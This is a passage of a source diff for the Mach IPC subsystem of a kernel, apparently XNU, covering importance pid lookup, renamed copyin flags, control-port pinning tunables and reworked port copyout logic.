-                                   "%d (%d of %d boosts) %s from pid ", t_pid,
-                                   III_EXTERN(inherit), inherit->iii_externcnt,
-                                   (inherit->iii_donating) ? "donated" : "linked");
                        }
-
-                       size = (mach_voucher_attr_content_size_t)strlen((char *)out_content);
+#if DEVELOPMENT || DEBUG
+                       pos += scnprintf(buf + pos, size - pos, "%s[%d]",
+                           task_imp->iit_procname, task_imp->iit_bsd_pid);
+#else
+                       ipc_importance_lock();
+                       pid = task_importance_task_get_pid(task_imp);
+                       ipc_importance_unlock();
+                       pos += scnprintf(buf + pos, size - pos, "pid %d", pid);
+#endif /* DEVELOPMENT || DEBUG */
 
                        if (III_NULL == inherit) {
                                break;
                        }
-
+                       pos += scnprintf(buf + pos, size - pos,
+                           " (%d of %d boosts) %s from ",
+                           III_EXTERN(inherit), inherit->iii_externcnt,
+                           (inherit->iii_donating) ? "donated" : "linked");
                        elem = inherit->iii_from_elem;
                }
-               size++; /* account for NULL */
+
+               pos++; /* account for terminating \0 */
+               break;
        }
        *out_command = MACH_VOUCHER_ATTR_NOOP; /* cannot be used to regenerate value */
-       *in_out_content_size = size;
+       *in_out_content_size = pos;
        return KERN_SUCCESS;
 }
 
@@ -3863,14 +3869,7 @@ task_importance_list_pids(task_t task, int flags, char *pid_list, unsigned int m
                target_pid = -1;
 
                if (temp_inherit->iii_donating) {
-#if DEVELOPMENT || DEBUG
-                       target_pid = temp_inherit->iii_to_task->iit_bsd_pid;
-#else
-                       temp_task = temp_inherit->iii_to_task->iit_task;
-                       if (temp_task != TASK_NULL) {
-                               target_pid = task_pid(temp_task);
-                       }
-#endif
+                       target_pid = task_importance_task_get_pid(temp_inherit->iii_to_task);
                }
 
                if (target_pid != -1 && previous_pid != target_pid) {
@@ -3898,19 +3897,12 @@ task_importance_list_pids(task_t task, int flags, char *pid_list, unsigned int m
                        continue;
                }
 
-               if (IIE_TYPE_TASK == IIE_TYPE(elem) &&
-                   (((ipc_importance_task_t)elem)->iit_task != TASK_NULL)) {
-                       target_pid = task_pid(((ipc_importance_task_t)elem)->iit_task);
+               if (IIE_TYPE_TASK == IIE_TYPE(elem)) {
+                       ipc_importance_task_t temp_iit = (ipc_importance_task_t)elem;
+                       target_pid = task_importance_task_get_pid(temp_iit);
                } else {
                        temp_inherit = (ipc_importance_inherit_t)elem;
-#if DEVELOPMENT || DEBUG
-                       target_pid = temp_inherit->iii_to_task->iit_bsd_pid;
-#else
-                       temp_task = temp_inherit->iii_to_task->iit_task;
-                       if (temp_task != TASK_NULL) {
-                               target_pid = task_pid(temp_task);
-                       }
-#endif
+                       target_pid = task_importance_task_get_pid(temp_inherit->iii_to_task);
                }
 
                if (target_pid != -1 && previous_pid != target_pid) {
index b6ff1fc9efaeabd5401d2946cb815c7e5f12587c..b2a97a89c20aded7ab4c8b0f03b2388afa5dc400 100644 (file)
 
 #include <mach/machine/ndr_def.h>   /* NDR_record */
 
-#define IPC_KERNEL_MAP_SIZE      (1024 * 1024)
+#define IPC_KERNEL_MAP_SIZE      (CONFIG_IPC_KERNEL_MAP_SIZE * 1024 * 1024)
 SECURITY_READ_ONLY_LATE(vm_map_t) ipc_kernel_map;
 
 /* values to limit physical copy out-of-line memory descriptors */
@@ -125,6 +125,19 @@ const vm_size_t ipc_kmsg_max_vm_space = ((IPC_KERNEL_COPY_MAP_SIZE * 7) / 8);
 #define IPC_KMSG_MAX_SPACE (64 * 1024 * 1024) /* keep in sync with COPYSIZELIMIT_PANIC */
 const vm_size_t ipc_kmsg_max_body_space = ((IPC_KMSG_MAX_SPACE * 3) / 4 - MAX_TRAILER_SIZE);
 
+#if XNU_TARGET_OS_OSX
+#define IPC_CONTROL_PORT_OPTIONS_DEFAULT IPC_CONTROL_PORT_OPTIONS_NONE
+#else
+#define IPC_CONTROL_PORT_OPTIONS_DEFAULT (IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_HARD | IPC_CONTROL_PORT_OPTIONS_PINNED_SOFT)
+#endif
+
+TUNABLE(ipc_control_port_options_t, ipc_control_port_options,
+    "ipc_control_port_options", IPC_CONTROL_PORT_OPTIONS_DEFAULT);
+
+SECURITY_READ_ONLY_LATE(bool) pinned_control_port_enabled;
+SECURITY_READ_ONLY_LATE(bool) immovable_control_port_enabled;
+
+
 LCK_GRP_DECLARE(ipc_lck_grp, "ipc");
 LCK_ATTR_DECLARE(ipc_lck_attr, 0, 0);
 
@@ -163,6 +176,15 @@ ipc_init(void)
        arcade_init();
 #endif
 
+       pinned_control_port_enabled    = !!(ipc_control_port_options & (IPC_CONTROL_PORT_OPTIONS_PINNED_SOFT | IPC_CONTROL_PORT_OPTIONS_PINNED_HARD));
+       immovable_control_port_enabled = !!(ipc_control_port_options & (IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_SOFT | IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_HARD));
+
+       if (pinned_control_port_enabled && !immovable_control_port_enabled) {
+               kprintf("Invalid ipc_control_port_options boot-arg: pinned control port cannot be enabled without immovability enforcement. Ignoring pinning boot-arg.");
+               pinned_control_port_enabled = false;
+               ipc_control_port_options &= ~(IPC_CONTROL_PORT_OPTIONS_PINNED_SOFT | IPC_CONTROL_PORT_OPTIONS_PINNED_HARD);
+       }
+
        kr = kmem_suballoc(kernel_map, &min, IPC_KERNEL_MAP_SIZE,
            TRUE,
            (VM_FLAGS_ANYWHERE),
index 04ec259aa1be447189f2f1c2b77c6039a24d0bea..8b219581df51e6bf2079801eb2b0f039229ca96a 100644 (file)
@@ -90,7 +90,6 @@
 #include <kern/thread.h>
 #include <kern/sched_prim.h>
 #include <kern/misc_protos.h>
-#include <kern/counters.h>
 #include <kern/cpu_data.h>
 #include <kern/policy_internal.h>
 #include <kern/mach_filter.h>
@@ -2619,7 +2618,7 @@ ipc_kmsg_allow_immovable_send(
         *      rights in the message body to succeed
         */
        if (IO_VALID(object) && io_is_kobject(object)) {
-               kmsg->ikm_flags |= IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND;
+               kmsg->ikm_flags |= IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND;
        }
 }
 
@@ -2992,7 +2991,7 @@ ipc_kmsg_copyin_header(
                 */
                if (reply_entry != IE_NULL) {
                        kr = ipc_right_copyin(space, reply_name, reply_entry,
-                           reply_type, IPC_RIGHT_COPYIN_FLAGS_DEADOK,
+                           reply_type, IPC_OBJECT_COPYIN_FLAGS_DEADOK,
                            &reply_port, &reply_soright,
                            &release_port, &assertcnt, 0, NULL);
                        assert(assertcnt == 0);
@@ -3093,8 +3092,8 @@ ipc_kmsg_copyin_header(
                         *      copyin the destination.
                         */
                        kr = ipc_right_copyin(space, dest_name, dest_entry,
-                           dest_type, (IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND |
-                           IPC_RIGHT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE),
+                           dest_type, (IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND |
+                           IPC_OBJECT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE),
                            &dest_port, &dest_soright,
                            &release_port, &assertcnt, 0, NULL);
                        assert(assertcnt == 0);
@@ -3110,7 +3109,7 @@ ipc_kmsg_copyin_header(
                         */
                        if (MACH_PORT_VALID(reply_name)) {
                                kr = ipc_right_copyin(space, reply_name, reply_entry,
-                                   reply_type, IPC_RIGHT_COPYIN_FLAGS_DEADOK,
+                                   reply_type, IPC_OBJECT_COPYIN_FLAGS_DEADOK,
                                    &reply_port, &reply_soright,
                                    &release_port, &assertcnt, 0, NULL);
                                assert(assertcnt == 0);
@@ -3127,7 +3126,7 @@ ipc_kmsg_copyin_header(
                 */
                if (IE_NULL != voucher_entry) {
                        kr = ipc_right_copyin(space, voucher_name, voucher_entry,
-                           voucher_type, IPC_RIGHT_COPYIN_FLAGS_NONE,
+                           voucher_type, IPC_OBJECT_COPYIN_FLAGS_NONE,
                            (ipc_object_t *)&voucher_port,
                            &voucher_soright,
                            &voucher_release_port,
@@ -4605,6 +4604,7 @@ ipc_kmsg_copyout_header(
 
                uint32_t entries_held = 0;
                boolean_t need_write_lock = FALSE;
+               ipc_object_copyout_flags_t reply_copyout_options = IPC_OBJECT_COPYOUT_FLAGS_NONE;
                kern_return_t kr;
 
                /*
@@ -4625,6 +4625,7 @@ ipc_kmsg_copyout_header(
                }
 
                if (need_write_lock) {
+handle_reply_again:
                        is_write_lock(space);
 
                        while (entries_held) {
@@ -4649,32 +4650,48 @@ ipc_kmsg_copyout_header(
 
                        /* Handle reply port. */
                        if (IP_VALID(reply)) {
+                               ipc_port_t reply_subst = IP_NULL;
                                ipc_entry_t entry;
 
+                               ip_lock(reply);
+
+                               /* Is the reply port still active and allowed to be copied out? */
+                               if (!ip_active(reply) ||
+                                   !ip_label_check(space, reply, reply_type,
+                                   &reply_copyout_options, &reply_subst)) {
+                                       /* clear the context value */
+                                       reply->ip_reply_context = 0;
+                                       ip_unlock(reply);
+
+                                       assert(reply_subst == IP_NULL);
+                                       release_reply_port = reply;
+                                       reply = IP_DEAD;
+                                       reply_name = MACH_PORT_DEAD;
+                                       goto done_with_reply;
+                               }
+
+                               /* is the kolabel requesting a substitution */
+                               if (reply_subst != IP_NULL) {
+                                       /*
+                                        * port is unlocked, its right consumed
+                                        * space is unlocked
+                                        */
+                                       assert(reply_type == MACH_MSG_TYPE_PORT_SEND);
+                                       msg->msgh_local_port = reply = reply_subst;
+                                       goto handle_reply_again;
+                               }
+
+
                                /* Is there already an entry we can use? */
                                if ((reply_type != MACH_MSG_TYPE_PORT_SEND_ONCE) &&
                                    ipc_right_reverse(space, ip_to_object(reply), &reply_name, &entry)) {
-                                       /* reply port is locked and active */
                                        assert(entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE);
                                } else {
-                                       ip_lock(reply);
-                                       /* Is the reply port still active and allowed to be copied out? */
-                                       if (!ip_active(reply) || !ip_label_check(space, reply, reply_type)) {
-                                               /* clear the context value */
-                                               reply->ip_reply_context = 0;
-                                               ip_unlock(reply);
-
-                                               release_reply_port = reply;
-                                               reply = IP_DEAD;
-                                               reply_name = MACH_PORT_DEAD;
-                                               goto done_with_reply;
-                                       }
-
                                        /* claim a held entry for the reply port */
                                        assert(entries_held > 0);
                                        entries_held--;
                                        ipc_entry_claim(space, &reply_name, &entry);
-                                       assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE);
+                                       assert(!ipc_right_inuse(entry));
                                        assert(entry->ie_object == IO_NULL);
                                        entry->ie_object = ip_to_object(reply);
                                }
@@ -4711,7 +4728,8 @@ ipc_kmsg_copyout_header(
                                }
 
                                kr = ipc_right_copyout(space, reply_name, entry,
-                                   reply_type, NULL, NULL, ip_to_object(reply));
+                                   reply_type, IPC_OBJECT_COPYOUT_FLAGS_NONE, NULL, NULL,
+                                   ip_to_object(reply));
                                assert(kr == KERN_SUCCESS);
                                /* reply port is unlocked */
                        } else {
@@ -4738,25 +4756,25 @@ done_with_reply:
                                if ((option & MACH_RCV_VOUCHER) != 0) {
                                        ipc_entry_t entry;
 
+                                       ip_lock(voucher);
+
                                        if (ipc_right_reverse(space, ip_to_object(voucher),
                                            &voucher_name, &entry)) {
-                                               /* voucher port locked */
                                                assert(entry->ie_bits & MACH_PORT_TYPE_SEND);
                                        } else {
                                                assert(entries_held > 0);
                                                entries_held--;
                                                ipc_entry_claim(space, &voucher_name, &entry);
-                                               assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE);
+                                               assert(!ipc_right_inuse(entry));
                                                assert(entry->ie_object == IO_NULL);
                                                entry->ie_object = ip_to_object(voucher);
-                                               ip_lock(voucher);
                                        }
                                        /* space is locked and active */
-                                       require_ip_active(voucher);
+
                                        assert(ip_kotype(voucher) == IKOT_VOUCHER);
                                        kr = ipc_right_copyout(space, voucher_name, entry,
-                                           MACH_MSG_TYPE_MOVE_SEND, NULL, NULL,
-                                           ip_to_object(voucher));
+                                           MACH_MSG_TYPE_MOVE_SEND, IPC_OBJECT_COPYOUT_FLAGS_NONE,
+                                           NULL, NULL, ip_to_object(voucher));
                                        /* voucher port is unlocked */
                                } else {
                                        voucher_type = MACH_MSGH_BITS_ZERO;
@@ -4931,8 +4949,7 @@ done_with_voucher:
  *             MACH_MSG_IPC_KERNEL     Kernel resource shortage.
  *                     (Name is MACH_PORT_NULL.)
  */
-
-mach_msg_return_t
+static mach_msg_return_t
 ipc_kmsg_copyout_object(
        ipc_space_t             space,
        ipc_object_t            object,
@@ -4948,10 +4965,9 @@ ipc_kmsg_copyout_object(
                return MACH_MSG_SUCCESS;
        }
 
-       kr = ipc_object_copyout(space, object, msgt_name, context, guard_flags, namep);
+       kr = ipc_object_copyout(space, object, msgt_name, IPC_OBJECT_COPYOUT_FLAGS_NONE,
+           context, guard_flags, namep);
        if (kr != KERN_SUCCESS) {
-               ipc_object_destroy(object, msgt_name);
-
                if (kr == KERN_INVALID_CAPABILITY) {
                        *namep = MACH_PORT_DEAD;
                } else {
@@ -4969,14 +4985,15 @@ ipc_kmsg_copyout_object(
 }
 
 static mach_msg_descriptor_t *
-ipc_kmsg_copyout_port_descriptor(mach_msg_descriptor_t *dsc,
-    mach_msg_descriptor_t *dest_dsc,
-    ipc_space_t space,
-    kern_return_t *mr)
+ipc_kmsg_copyout_port_descriptor(
+       mach_msg_descriptor_t   *dsc,
+       mach_msg_descriptor_t   *dest_dsc,
+       ipc_space_t             space,
+       kern_return_t           *mr)
 {
-       mach_port_t                 port;
-       mach_port_name_t            name;
-       mach_msg_type_name_t                disp;
+       mach_port_t             port;
+       mach_port_name_t        name;
+       mach_msg_type_name_t    disp;
 
        /* Copyout port right carried in the message */
        port = dsc->port.name;
@@ -5005,17 +5022,20 @@ ipc_kmsg_copyout_port_descriptor(mach_msg_descriptor_t *dsc,
        return (mach_msg_descriptor_t *)dest_dsc;
 }
 
-mach_msg_descriptor_t *
-ipc_kmsg_copyout_ool_descriptor(mach_msg_ool_descriptor_t *dsc, mach_msg_descriptor_t *user_dsc, int is_64bit, vm_map_t map, mach_msg_return_t *mr);
-mach_msg_descriptor_t *
-ipc_kmsg_copyout_ool_descriptor(mach_msg_ool_descriptor_t *dsc, mach_msg_descriptor_t *user_dsc, int is_64bit, vm_map_t map, mach_msg_return_t *mr)
+static mach_msg_descriptor_t *
+ipc_kmsg_copyout_ool_descriptor(
+       mach_msg_ool_descriptor_t   *dsc,
+       mach_msg_descriptor_t       *user_dsc,
+       int                         is_64bit,
+       vm_map_t                    map,
+       mach_msg_return_t           *mr)
 {
-       vm_map_copy_t                       copy;
-       vm_map_address_t                    rcv_addr;
-       mach_msg_copy_options_t             copy_options;
-       vm_map_size_t                       size;
+       vm_map_copy_t               copy;
+       vm_map_address_t            rcv_addr;
+       mach_msg_copy_options_t     copy_options;
+       vm_map_size_t               size;
        mach_msg_descriptor_type_t  dsc_type;
-       boolean_t                           misaligned = FALSE;
+       boolean_t                   misaligned = FALSE;
 
        //SKIP_PORT_DESCRIPTORS(saddr, sdsc_count);
 
@@ -5441,20 +5461,24 @@ ipc_kmsg_copyout_body(
        for (i = dsc_count - 1; i >= 0; i--) {
                switch (kern_dsc[i].type.type) {
                case MACH_MSG_PORT_DESCRIPTOR:
-                       user_dsc = ipc_kmsg_copyout_port_descriptor(&kern_dsc[i], user_dsc, space, &mr);
+                       user_dsc = ipc_kmsg_copyout_port_descriptor(&kern_dsc[i],
+                           user_dsc, space, &mr);
                        break;
                case MACH_MSG_OOL_VOLATILE_DESCRIPTOR:
                case MACH_MSG_OOL_DESCRIPTOR:
                        user_dsc = ipc_kmsg_copyout_ool_descriptor(
-                               (mach_msg_ool_descriptor_t *)&kern_dsc[i], user_dsc, is_task_64bit, map, &mr);
+                               (mach_msg_ool_descriptor_t *)&kern_dsc[i],
+                               user_dsc, is_task_64bit, map, &mr);
                        break;
                case MACH_MSG_OOL_PORTS_DESCRIPTOR:
                        user_dsc = ipc_kmsg_copyout_ool_ports_descriptor(
-                               (mach_msg_ool_ports_descriptor_t *)&kern_dsc[i], user_dsc, is_task_64bit, map, space, kmsg, &mr);
+                               (mach_msg_ool_ports_descriptor_t *)&kern_dsc[i],
+                               user_dsc, is_task_64bit, map, space, kmsg, &mr);
                        break;
                case MACH_MSG_GUARDED_PORT_DESCRIPTOR:
                        user_dsc = ipc_kmsg_copyout_guarded_port_descriptor(
-                               (mach_msg_guarded_port_descriptor_t *)&kern_dsc[i], user_dsc, is_task_64bit, kmsg, space, option, &mr);
+                               (mach_msg_guarded_port_descriptor_t *)&kern_dsc[i],
+                               user_dsc, is_task_64bit, kmsg, space, option, &mr);
                        break;
                default: {
                        panic("untyped IPC copyout body: invalid message descriptor");
index dff4370cf010d78f6dc7ae767b4317b6a43bbeeb..fe744639f77816cbc35f0295f619b503aa62ed72 100644 (file)
 #include <ipc/ipc_object.h>
 #include <sys/kdebug.h>
 
-typedef uint16_t ipc_kmsg_flags_t;
-
-#define IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND 0x1       /* Dest port contains an immovable send right */
-
 #if (DEVELOPMENT || DEBUG)
 /* Turn on to keep partial message signatures for better debug */
 #define IKM_PARTIAL_SIG        0
@@ -107,8 +103,6 @@ typedef uint16_t ipc_kmsg_flags_t;
  */
 
 struct ipc_kmsg {
-       mach_msg_size_t            ikm_size;
-       uint32_t                   ikm_ppriority;    /* pthread priority of this kmsg */
        struct ipc_kmsg            *ikm_next;        /* next message on port/discard queue */
        struct ipc_kmsg            *ikm_prev;        /* prev message on port/discard queue */
        union {
@@ -123,12 +117,14 @@ struct ipc_kmsg {
 #if MACH_FLIPC
        struct mach_node           *ikm_node;        /* Originating node - needed for ack */
 #endif
+       mach_msg_size_t            ikm_size;
+       uint32_t                   ikm_ppriority;    /* pthread priority of this kmsg */
 #if IKM_PARTIAL_SIG
        uintptr_t                  ikm_header_sig;   /* sig for just the header */
        uintptr_t                  ikm_headtrail_sig;/* sif for header and trailer */
 #endif
        uintptr_t                  ikm_signature;    /* sig for all kernel-processed data */
-       ipc_kmsg_flags_t           ikm_flags;
+       ipc_object_copyin_flags_t  ikm_flags;
        mach_msg_qos_t             ikm_qos_override; /* qos override on this kmsg */
        mach_msg_filter_id         ikm_filter_policy_id; /* Sandbox-specific policy id used for message filtering */
 };
@@ -334,15 +330,6 @@ extern mach_msg_return_t ipc_kmsg_copyout_header(
        ipc_space_t             space,
        mach_msg_option_t       option);
 
-/* Copyout a port right returning a name */
-extern mach_msg_return_t ipc_kmsg_copyout_object(
-       ipc_space_t             space,
-       ipc_object_t            object,
-       mach_msg_type_name_t    msgt_name,
-       mach_port_context_t     *context,
-       mach_msg_guard_flags_t  *guard_flags,
-       mach_port_name_t        *namep);
-
 /* Copyout the header and body to a user message */
 extern mach_msg_return_t ipc_kmsg_copyout(
        ipc_kmsg_t              kmsg,
index d715828abb4bf794cf44f27266ee8cf89728de42..98ad438bbb186a2cf4f591426a87f14b645e8460 100644 (file)
@@ -75,7 +75,7 @@
 #include <mach/sync_policy.h>
 
 #include <kern/assert.h>
-#include <kern/counters.h>
+#include <kern/counter.h>
 #include <kern/sched_prim.h>
 #include <kern/ipc_kobject.h>
 #include <kern/ipc_mig.h>       /* XXX - for mach_msg_receive_continue */
@@ -188,7 +188,6 @@ imq_reserve_and_lock(ipc_mqueue_t mq, uint64_t *reserved_prepost)
 void
 imq_release_and_unlock(ipc_mqueue_t mq, uint64_t reserved_prepost)
 {
-       assert(imq_held(mq));
        waitq_unlock(&mq->imq_wait_queue);
        waitq_prepost_release_reserve(reserved_prepost);
 }
@@ -592,7 +591,6 @@ ipc_mqueue_send(
 
                if (wresult == THREAD_WAITING) {
                        wresult = thread_block(THREAD_CONTINUE_NULL);
-                       counter(c_ipc_mqueue_send_block++);
                }
 
                /* Call turnstile complete with interlock held */
@@ -678,11 +676,7 @@ ipc_mqueue_override_send(
        if (full_queue_empty) {
                ipc_port_t port = ip_from_mq(mqueue);
                int dst_pid = 0;
-               if (ip_active(port) && !port->ip_tempowner &&
-                   port->ip_receiver_name && port->ip_receiver &&
-                   port->ip_receiver != ipc_space_kernel) {
-                       dst_pid = task_pid(port->ip_receiver->is_task);
-               }
+               dst_pid = ipc_port_get_receiver_task(port, NULL);
        }
 #endif
 }
@@ -704,7 +698,7 @@ ipc_mqueue_release_msgcount(ipc_mqueue_t port_mq, ipc_mqueue_t set_mq)
 {
        struct turnstile *send_turnstile = port_send_turnstile(ip_from_mq(port_mq));
        (void)set_mq;
-       assert(imq_held(port_mq));
+       imq_held(port_mq);
        assert(port_mq->imq_msgcount > 1 || ipc_kmsg_queue_empty(&port_mq->imq_messages));
 
        port_mq->imq_msgcount--;
@@ -1037,10 +1031,6 @@ ipc_mqueue_receive(
        }
 
        if (wresult == THREAD_WAITING) {
-               counter((interruptible == THREAD_ABORTSAFE) ?
-                   c_ipc_mqueue_receive_block_user++ :
-                   c_ipc_mqueue_receive_block_kernel++);
-
                if (self->ith_continuation) {
                        thread_block(ipc_mqueue_receive_continue);
                }
@@ -1488,7 +1478,7 @@ void
 ipc_mqueue_release_peek_ref(ipc_mqueue_t mq)
 {
        assert(!imq_is_set(mq));
-       assert(imq_held(mq));
+       imq_held(mq);
 
        /*
         * clear any preposts this mq may have generated
@@ -1718,7 +1708,7 @@ ipc_mqueue_destroy_locked(ipc_mqueue_t mqueue)
  *             Changes a message queue limit; the maximum number
  *             of messages which may be queued.
  *     Conditions:
- *             Nothing locked.
+ *             Port is locked.
  */
 
 void
index 98ea22434841ea7113420164631642e7d69d5027..47ed2259d1d1dca938f38bf98220e93933cd691a 100644 (file)
@@ -164,7 +164,7 @@ typedef struct ipc_mqueue {
 #define imq_is_valid(mq)        waitq_is_valid(&(mq)->imq_wait_queue)
 
 #define imq_unlock(mq)          waitq_unlock(&(mq)->imq_wait_queue)
-#define imq_held(mq)            waitq_held(&(mq)->imq_wait_queue)
+#define imq_held(mq)            assert(waitq_held(&(mq)->imq_wait_queue))
 #define imq_valid(mq)           waitq_valid(&(mq)->imq_wait_queue)
 
 extern void imq_lock(ipc_mqueue_t mq);
index 5086568f6f989124be8056cbfdb6d67aa52980bd..f65ceff405b2881ff3e5f5c2a3c07d8c1df8a7f5 100644 (file)
@@ -336,7 +336,8 @@ ipc_object_alloc_dead_name(
        }
        /* space is write-locked */
 
-       if (ipc_right_inuse(space, name, entry)) {
+       if (ipc_right_inuse(entry)) {
+               is_write_unlock(space);
                return KERN_NAME_EXISTS;
        }
 
@@ -382,21 +383,11 @@ ipc_object_alloc(
        assert(type != MACH_PORT_TYPE_NONE);
        assert(urefs <= MACH_PORT_UREFS_MAX);
 
-       object = io_alloc(otype);
+       object = io_alloc(otype, Z_WAITOK | Z_ZERO);
        if (object == IO_NULL) {
                return KERN_RESOURCE_SHORTAGE;
        }
 
-       if (otype == IOT_PORT) {
-               ipc_port_t port = ip_object_to_port(object);
-
-               bzero((char *)port, sizeof(*port));
-       } else if (otype == IOT_PORT_SET) {
-               ipc_pset_t pset = ips_object_to_pset(object);
-
-               bzero((char *)pset, sizeof(*pset));
-       }
-
        io_lock_init(object);
        *namep = CAST_MACH_PORT_TO_NAME(object);
        kr = ipc_entry_alloc(space, namep, &entry);
@@ -451,21 +442,11 @@ ipc_object_alloc_name(
        assert(type != MACH_PORT_TYPE_NONE);
        assert(urefs <= MACH_PORT_UREFS_MAX);
 
-       object = io_alloc(otype);
+       object = io_alloc(otype, Z_WAITOK | Z_ZERO);
        if (object == IO_NULL) {
                return KERN_RESOURCE_SHORTAGE;
        }
 
-       if (otype == IOT_PORT) {
-               ipc_port_t port = ip_object_to_port(object);
-
-               bzero((char *)port, sizeof(*port));
-       } else if (otype == IOT_PORT_SET) {
-               ipc_pset_t pset = ips_object_to_pset(object);
-
-               bzero((char *)pset, sizeof(*pset));
-       }
-
        io_lock_init(object);
        kr = ipc_entry_alloc_name(space, name, &entry);
        if (kr != KERN_SUCCESS) {
@@ -474,7 +455,8 @@ ipc_object_alloc_name(
        }
        /* space is write-locked */
 
-       if (ipc_right_inuse(space, name, entry)) {
+       if (ipc_right_inuse(entry)) {
+               is_write_unlock(space);
                io_free(otype, object);
                return KERN_NAME_EXISTS;
        }
@@ -562,13 +544,13 @@ ipc_object_copyin_type(
 
 kern_return_t
 ipc_object_copyin(
-       ipc_space_t             space,
-       mach_port_name_t        name,
-       mach_msg_type_name_t    msgt_name,
-       ipc_object_t            *objectp,
-       mach_port_context_t     context,
-       mach_msg_guard_flags_t  *guard_flags,
-       ipc_kmsg_flags_t        kmsg_flags)
+       ipc_space_t                space,
+       mach_port_name_t           name,
+       mach_msg_type_name_t       msgt_name,
+       ipc_object_t               *objectp,
+       mach_port_context_t        context,
+       mach_msg_guard_flags_t     *guard_flags,
+       ipc_object_copyin_flags_t  copyin_flags)
 {
        ipc_entry_t entry;
        ipc_port_t soright;
@@ -576,11 +558,9 @@ ipc_object_copyin(
        kern_return_t kr;
        int assertcnt = 0;
 
-       ipc_right_copyin_flags_t irc_flags = IPC_RIGHT_COPYIN_FLAGS_DEADOK;
-       if (kmsg_flags & IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND) {
-               irc_flags |= IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND;
-       }
-
+       ipc_object_copyin_flags_t irc_flags = IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND |
+           IPC_OBJECT_COPYIN_FLAGS_SOFT_FAIL_IMMOVABLE_SEND;
+       irc_flags = (copyin_flags & irc_flags) | IPC_OBJECT_COPYIN_FLAGS_DEADOK;
        /*
         *      Could first try a read lock when doing
         *      MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND,
@@ -685,8 +665,8 @@ ipc_object_copyin_from_kernel(
                ip_lock(port);
                if (ip_active(port)) {
                        assert(port->ip_srights > 0);
-                       port->ip_srights++;
                }
+               port->ip_srights++;
                ip_reference(port);
                ip_unlock(port);
                break;
@@ -908,7 +888,7 @@ ipc_object_insert_send_right(
  *     Routine:        ipc_object_copyout
  *     Purpose:
  *             Copyout a capability, placing it into a space.
- *             If successful, consumes a ref for the object.
+ *             Always consumes a ref for the object.
  *     Conditions:
  *             Nothing locked.
  *     Returns:
@@ -926,12 +906,14 @@ ipc_object_copyout(
        ipc_space_t             space,
        ipc_object_t            object,
        mach_msg_type_name_t    msgt_name,
+       ipc_object_copyout_flags_t flags,
        mach_port_context_t     *context,
        mach_msg_guard_flags_t  *guard_flags,
        mach_port_name_t        *namep)
 {
        struct knote *kn = current_thread()->ith_knote;
        mach_port_name_t name;
+       ipc_port_t port = ip_object_to_port(object);
        ipc_entry_t entry;
        kern_return_t kr;
 
@@ -939,73 +921,98 @@ ipc_object_copyout(
        assert(io_otype(object) == IOT_PORT);
 
        if (ITH_KNOTE_VALID(kn, msgt_name)) {
-               filt_machport_turnstile_prepare_lazily(kn,
-                   msgt_name, ip_object_to_port(object));
+               filt_machport_turnstile_prepare_lazily(kn, msgt_name, port);
        }
 
        is_write_lock(space);
 
        for (;;) {
+               ipc_port_t port_subst = IP_NULL;
+
                if (!is_active(space)) {
                        is_write_unlock(space);
-                       return KERN_INVALID_TASK;
-               }
-
-               if ((msgt_name != MACH_MSG_TYPE_PORT_SEND_ONCE) &&
-                   ipc_right_reverse(space, object, &name, &entry)) {
-                       /* object is locked and active */
-
-                       assert(entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE);
-                       break;
+                       kr = KERN_INVALID_TASK;
+                       goto out;
                }
 
-
-               name = CAST_MACH_PORT_TO_NAME(object);
-               kr = ipc_entry_get(space, &name, &entry);
+               kr = ipc_entries_hold(space, 1);
                if (kr != KERN_SUCCESS) {
                        /* unlocks/locks space, so must start again */
 
                        kr = ipc_entry_grow_table(space, ITS_SIZE_NONE);
                        if (kr != KERN_SUCCESS) {
-                               return kr; /* space is unlocked */
+                               /* space is unlocked */
+                               goto out;
                        }
                        continue;
                }
 
-               assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE);
-               assert(entry->ie_object == IO_NULL);
-
                io_lock(object);
                if (!io_active(object)) {
                        io_unlock(object);
-                       ipc_entry_dealloc(space, name, entry);
                        is_write_unlock(space);
-                       return KERN_INVALID_CAPABILITY;
+                       kr = KERN_INVALID_CAPABILITY;
+                       goto out;
                }
 
                /* Don't actually copyout rights we aren't allowed to */
-               if (!ip_label_check(space, ip_object_to_port(object), msgt_name)) {
+               if (!ip_label_check(space, port, msgt_name, &flags, &port_subst)) {
                        io_unlock(object);
-                       ipc_entry_dealloc(space, name, entry);
                        is_write_unlock(space);
-                       return KERN_INVALID_CAPABILITY;
+                       assert(port_subst == IP_NULL);
+                       kr = KERN_INVALID_CAPABILITY;
+                       goto out;
+               }
+
+               /* is the kolabel requesting a substitution */
+               if (port_subst != IP_NULL) {
+                       /*
+                        * port is unlocked, its right consumed
+                        * space is unlocked
+                        */
+                       assert(msgt_name == MACH_MSG_TYPE_PORT_SEND);
+                       port = port_subst;
+                       if (!IP_VALID(port)) {
+                               object = IO_DEAD;
+                               kr = KERN_INVALID_CAPABILITY;
+                               goto out;
+                       }
+
+                       object = ip_to_object(port);
+                       is_write_lock(space);
+                       continue;
                }
 
-               entry->ie_object = object;
                break;
        }
 
        /* space is write-locked and active, object is locked and active */
 
+       if ((msgt_name != MACH_MSG_TYPE_PORT_SEND_ONCE) &&
+           ipc_right_reverse(space, object, &name, &entry)) {
+               assert(entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE);
+       } else {
+               ipc_entry_claim(space, &name, &entry);
+
+               assert(!ipc_right_inuse(entry));
